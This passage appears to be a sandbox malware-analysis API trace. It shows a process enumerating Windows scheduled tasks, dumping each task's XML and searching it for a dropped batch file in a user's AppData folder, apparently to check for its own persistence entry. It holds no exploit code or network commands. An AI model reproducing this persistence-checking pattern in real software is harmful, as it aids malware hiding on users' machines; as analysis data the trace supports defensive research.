PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 10\r\n PT12H\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T12:00:00\r\n \r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0163.380] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\IntegrityCheck\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 10\r\n PT12H\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T12:00:00\r\n \r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.380] IUnknown:Release (This=0x929740) returned 0x0 [0163.380] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.380] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="RegisterDeviceAccountChange") returned 0x0 [0163.380] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceAccountChange\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 10\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7540BCA33E0B8441\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0163.384] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceAccountChange\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 10\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7540BCA33E0B8441\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.384] IUnknown:Release (This=0x929740) returned 0x0 [0163.384] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.384] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="RegisterDeviceConnectedToNetwork") returned 0x0 [0163.384] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceConnectedToNetwork\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33A0D8B41\r\n 01\r\n 16\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0163.386] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceConnectedToNetwork\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33A0D8B41\r\n 01\r\n 16\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.386] IUnknown:Release (This=0x929740) returned 0x0 [0163.386] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.386] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="RegisterDevicePeriodic1") returned 0x0 [0163.386] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDevicePeriodic1\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T12:30:00\r\n \r\n PT1H\r\n \r\n PT15M\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0163.389] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDevicePeriodic1\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T12:30:00\r\n \r\n PT1H\r\n \r\n PT15M\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.389] IUnknown:Release (This=0x929740) returned 0x0 [0163.389] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.389] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="RegisterDevicePeriodic24") returned 0x0 [0163.389] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDevicePeriodic24\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 1\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T06:00:00\r\n \r\n P1D\r\n \r\n PT6H\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0163.391] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDevicePeriodic24\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 1\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T06:00:00\r\n \r\n P1D\r\n \r\n PT6H\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.391] IUnknown:Release (This=0x929740) returned 0x0 [0163.391] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.391] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="RegisterDevicePeriodic6") returned 0x0 [0163.391] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDevicePeriodic6\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T09:00:00\r\n \r\n PT6H\r\n \r\n PT1H30M\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0163.393] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDevicePeriodic6\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2015-01-01T09:00:00\r\n \r\n PT6H\r\n \r\n PT1H30M\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.393] IUnknown:Release (This=0x929740) returned 0x0 [0163.393] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.393] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="RegisterDeviceScreenOnOff") returned 0x0 [0163.393] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceScreenOnOff\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0163.396] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceScreenOnOff\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.396] IUnknown:Release (This=0x929740) returned 0x0 [0163.396] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.396] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="RegisterDeviceSettingChange") returned 0x0 [0163.396] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceSettingChange\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 1\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 75F8BCA33E06830D\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0163.401] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterDeviceSettingChange\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 1\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 75F8BCA33E06830D\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.401] IUnknown:Release (This=0x929740) returned 0x0 [0163.401] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929740) returned 0x0 [0163.401] IRegisteredTask:get_Name (in: This=0x929740, pName=0xce058 | out: pName=0xce058*="RegisterUserDevice") returned 0x0 [0163.401] IRegisteredTask:get_Xml (in: This=0x929740, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterUserDevice\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 10\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT15M\r\n \r\n \r\n 7540BCA33E0B8441\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n") returned 0x0 [0163.403] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;SY)(A;;FRFX;;;BA)\r\n \\Microsoft\\Windows\\DeviceDirectoryClient\\RegisterUserDevice\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 10\r\n \r\n 10\r\n PT12H\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT15M\r\n \r\n \r\n 7540BCA33E0B8441\r\n \r\n \r\n \r\n \r\n {AE31B729-D5FD-401E-AF42-784074835AFE}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.403] IUnknown:Release (This=0x929740) returned 0x0 [0163.403] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.403] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295a0) returned 0x0 [0163.406] ITaskFolderCollection:get_Count (in: This=0x9295a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.406] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.406] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.406] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.407] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.410] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.410] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.410] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="Scheduled") returned 0x0 [0163.410] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-102)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-101)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-103)\r\n \\Microsoft\\Windows\\Diagnosis\\Scheduled\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n {C1F85EF8-BCC2-4606-BB39-70C523715EB3}\r\n \r\n \r\n") returned 0x0 [0163.413] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-102)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-101)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-103)\r\n \\Microsoft\\Windows\\Diagnosis\\Scheduled\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n {C1F85EF8-BCC2-4606-BB39-70C523715EB3}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.413] IUnknown:Release (This=0x929710) returned 0x0 [0163.413] IUnknown:Release (This=0x929590) returned 0x0 [0163.413] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.430] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.430] IUnknown:Release (This=0x929590) returned 0x0 [0163.430] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.430] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.430] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.433] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.433] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929710) returned 0x0 [0163.434] IRegisteredTask:get_Name (in: This=0x929710, pName=0xce058 | out: pName=0xce058*="SilentCleanup") returned 0x0 [0163.434] IRegisteredTask:get_Xml (in: This=0x929710, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%systemroot%\\system32\\cleanmgr.exe,-1300)\r\n $(@%systemroot%\\system32\\cleanmgr.exe,-1300)\r\n $(@%systemroot%\\system32\\cleanmgr.exe,-1301)\r\n \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n true\r\n \r\n true\r\n \r\n P1D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\cleanmgr.exe\r\n /autoclean /d %systemdrive%\r\n \r\n \r\n") returned 0x0 [0163.437] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%systemroot%\\system32\\cleanmgr.exe,-1300)\r\n $(@%systemroot%\\system32\\cleanmgr.exe,-1300)\r\n $(@%systemroot%\\system32\\cleanmgr.exe,-1301)\r\n \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n true\r\n \r\n true\r\n \r\n P1D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\cleanmgr.exe\r\n /autoclean /d %systemdrive%\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.437] IUnknown:Release (This=0x929710) returned 0x0 [0163.437] IUnknown:Release (This=0x929590) returned 0x0 [0163.437] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.440] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.440] IUnknown:Release (This=0x929590) returned 0x0 [0163.440] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.440] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.440] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.444] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0163.444] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.444] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Microsoft-Windows-DiskDiagnosticDataCollector") returned 0x0 [0163.444] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-119)\r\n \\Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P14D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n dfdts.dll,DfdGetDefaultPolicyAndSMART\r\n \r\n \r\n") returned 0x0 [0163.447] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-119)\r\n \\Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P14D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n dfdts.dll,DfdGetDefaultPolicyAndSMART\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.447] IUnknown:Release (This=0x929720) returned 0x0 [0163.447] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.447] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Microsoft-Windows-DiskDiagnosticResolver") returned 0x0 [0163.447] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-118)\r\n \\Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\DFDWiz.exe\r\n \r\n \r\n") returned 0x0 [0163.454] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-118)\r\n \\Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver\r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\DFDWiz.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.454] IUnknown:Release (This=0x929720) returned 0x0 [0163.454] IUnknown:Release (This=0x929590) returned 0x0 [0163.454] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.457] ITaskFolderCollection:get_Count (in: This=0x929590, 